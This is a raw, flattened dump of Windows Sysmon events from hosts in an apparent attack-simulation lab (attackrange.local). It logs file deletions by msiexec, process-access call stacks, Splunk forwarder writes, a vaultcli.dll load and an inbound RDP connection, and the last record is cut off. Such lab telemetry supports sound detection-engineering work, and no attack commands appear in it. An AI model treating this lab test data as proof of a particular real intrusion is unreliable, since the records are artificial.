14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=1526A6BFD45A73AA7F9492F2B7AC9614,SHA256=07E658D8D340B0CFF91ED616CAABEB8296EB14A8B1DF4F39CE2068EE9E82FDB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF67E0953FC0683CF8.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF269B78A9733E09F8.TMPMD5=1526A6BFD45A73AA7F9492F2B7AC9614,SHA256=07E658D8D340B0CFF91ED616CAABEB8296EB14A8B1DF4F39CE2068EE9E82FDB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF67297709AE8C186C.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFCC43B8AFB774205F.TMPMD5=1526A6BFD45A73AA7F9492F2B7AC9614,SHA256=07E658D8D340B0CFF91ED616CAABEB8296EB14A8B1DF4F39CE2068EE9E82FDB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d08292.msiMD5=63A359769E597BBD46346288EF0ED318,SHA256=F470AF206DADE9E0AFC4BE5A5ED3FAC28455F02D62702B4FFA56C652A8E5985E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.218{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF9984CC6DCFCF742A.TMPMD5=F22A12511D8683F42651B513324A4759,SHA256=84DCBEDD58377EB26C95448C81224EB1AEFB1EA0BE556E172AD142264114AD92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.218{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFC033B0961D34BB2C.TMPMD5=FE64553FD05A01159287835C3E363BE0,SHA256=C3A36B12F70EFB1B9D80E2040D7275FB06A505F1CD9BB4D0AD681747C9645E98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08294.rbsMD5=51F5666FC08A0621F682C63F7A05B0B6,SHA256=F90D36C3A96D25FB2A34269A4434D64195972171EBC5400F67A4035D949EF93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2E43F3728CEAEBAD.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2F776323349F1A13.TMPMD5=2744EFA9A9181312E199B2CFD968E808,SHA256=C5331079FFC27C30C3AC81928A316A209BBA6C3A882F70AB7B358C3C8109123C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF1346D016981BB737.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFB290E71EA81F43A1.TMPMD5=2744EFA9A9181312E199B2CFD968E808,SHA256=C5331079FFC27C30C3AC81928A316A209BBA6C3A882F70AB7B358C3C8109123C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.186{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID6F5.tmpMD5=A496947E1644B364A1BEEC71181F4FE8,SHA256=D300241946A266FDCF615E83D65DCDA1888714A8A8E42A38836F1D842CCF6111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID8DD.tmpMD5=71B011ABE72028A25899A7F1B33CB409,SHA256=B0A1D0D40CD2A113BF34C0663443346C9B2CA88F9AABFE214B5DE70932D09636,IMPHASH=E3EC487F117DDC5C6CD318AF9785DD2Etruetrue 10341000x800000000000000074530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.155{A7A01FEF-EBD6-607E-B70C-00000000BB01}21243564C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x800000000000000074529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.155{A7A01FEF-EBD6-607E-B70C-00000000BB01}21243564C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43AA1793FFCA66FFB628B339F4B7768C,SHA256=93DA29BADA373B27CC868AA5895B7D8AFECF65FD8A17A0F8C8C17CDC97715F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F56FA42B063E325F01F63C604D567BC4,SHA256=D406DD0C73738F643C01AC90379215E3E853289E9EC792A1917711DCD71987D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=859048391BD53D2AFA799142EF36376A,SHA256=37A86A3A78738D87D6D81A53D41E60F6FBC7BE1C405ECAE6C1B394BCBDB4E4E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050270Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:27.395{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35724E21152094732CED17B8763EC45E,SHA256=ADD398B8400C944F9EE77D45E95056DD96E1B7D907151819D95E491F266EBA38,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050269Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:24.779{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57884-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050268Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:27.099{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AFAD330654E032DA7497C109796B208,SHA256=3D255C5B4F95D425D5D7DF7C75F0E23AE61F924C5B331AF4AF353429A10B0BC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000074568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.578{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57533-false52.114.158.50-443https 354300x800000000000000074567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.414{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56299- 734700x800000000000000074566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.218{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeC:\Windows\System32\vaultcli.dll10.0.14393.4169 (rs1_release.210107-1130)Credential Vault Client LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationvaultcli.dllMD5=3A4413FEB384CA47420B1A7CB9099BF0,SHA256=338D718FF68D1ACF8AFC366E923B44128E821DDD50A9C282A5F55502BAF288FA,IMPHASH=E0B17C1B749544B11E7164BC8880263EtrueMicrosoft WindowsValid 10341000x800000000000000074565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.218{A7A01FEF-C0A6-607E-7705-00000000BB01}4348876C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61acc|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000074564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.218{A7A01FEF-C0A6-607E-7705-00000000BB01}4348876C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61acc|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000074563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.186{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBD8-607E-B80C-00000000BB01}6084C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.171{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD8-607E-B80C-00000000BB01}6084C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.171{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBD8-607E-B80C-00000000BB01}6084C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.014{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-walMD5=E9310E84CCA9263E3F1689A48134D5B5,SHA256=DCFAD4771830E0471F14B7498AA4514B70B620307E3DA0A1EB7C60FAECFD976A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.014{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shmMD5=22B2EC8EF92212E3E407145D7598625B,SHA256=7F17E1637D15AE927BC9565059080CBD03F5EF36D8EBB490A7DDBD6F86F006EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050275Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:28.974{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program 